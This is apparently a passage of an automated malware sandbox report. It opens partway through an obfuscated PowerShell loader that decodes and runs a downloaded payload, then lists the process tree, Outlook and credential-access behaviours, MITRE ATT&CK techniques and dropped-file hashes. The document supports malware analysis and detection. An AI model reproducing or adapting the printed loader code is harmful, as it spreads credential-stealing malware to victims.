ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
      4⤵
      Network Service Discovery
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1828
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hygrophthalmic.dis && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2984
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

Network Service Discovery

1

T1046

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e3771efc5fa30bbb843d29d3b1a00fe6

SHA1
0dd49a34ac21365a3fcfd0e78d0def629d06c84e

SHA256
a5f3b9dc56925014ff8fd458c0c7565bdc419b7378aa1845537a5014960ec902

SHA512
045176aeeff4aeb277afe8cd8224d85fc45ba96f7378295f57cce82ec492add0f94029e0362fe01e3c9af4ac8fbc10eb92d374b6e81aa10a9c19061f676aded2

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF97E.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7ADC.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Hygrophthalmic.dis

Filesize
474KB

MD5
a79506f805546d94c4280f98dcdd84a8

SHA1
b641bc5daef6955be1a63bfe38c6a941e3cab344

SHA256
a297eab229c20b75972e29a8ed769faeede656a3ab7e6646c19fd7a33eb7e633

SHA512
2082aa32a661c677014bfdd04b2ed24b9a04cc45295ce61a12b35dff6deccbeade24f6f78e5682768fb48a98337c8fd61c6b6bff6066f770ced3d399d602b8ec

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3063565911-2056067323-3330884624-1000\0f5007522459c86e95ffcc62f32308f1_de87a6d6-9d44-4942-9ec6-2be31b435411

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3063565911-2056067323-3330884624-1000\0f5007522459c86e95ffcc62f32308f1_de87a6d6-9d44-4942-9ec6-2be31b435411

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O6SLPJOL7DJM2Q1WZSGG.temp

Filesize
7KB

MD5
ffc507905e7b17644f6729f7b173fd7a

SHA1
d075a823d10c5b19d52ec7df155fe826d1fe9113

SHA256
049559a87fedf9222046034846c443e70c5e8e140de9ca841ef42efe7bbd9407

SHA512
a3e0dc09474be77d437eb8d11dcf973989e7a6af018d4cbf0f31b35d270414f0df909a4dfc716cd9ffbd581c11359da47a4e9d9995448faeac3334fab668a590

Download Submit
memory/580-40-0x0000000000590000-0x000000000289E000-memory.dmp

Filesize
35.1MB

Download
memory/580-65-0x0000000000590000-0x000000000289E000-memory.dmp

Filesize
35.1MB

Download
memory/580-64-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/1828-39-0x0000000006740000-0x0000000008A4E000-memory.dmp

Filesize
35.1MB

Download
memory/2576-38-0x000007FEF64A0000-0x000007FEF6E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-26-0x000007FEF64A0000-0x000007FEF6E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-35-0x000007FEF64A0000-0x000007FEF6E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-36-0x000007FEF64A0000-0x000007FEF6E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-37-0x000007FEF64A0000-0x000007FEF6E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-27-0x000007FEF64A0000-0x000007FEF6E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-24-0x000007FEF64A0000-0x000007FEF6E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-25-0x000007FEF64A0000-0x000007FEF6E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-21-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2576-22-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/2576-31-0x000007FEF64A0000-0x000007FEF6E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-30-0x000007FEF675E000-0x000007FEF675F000-memory.dmp

Filesize
4KB

Download
memory/2576-66-0x000007FEF64A0000-0x000007FEF6E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-23-0x000007FEF64A0000-0x000007FEF6E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-20-0x000007FEF675E000-0x000007FEF675F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing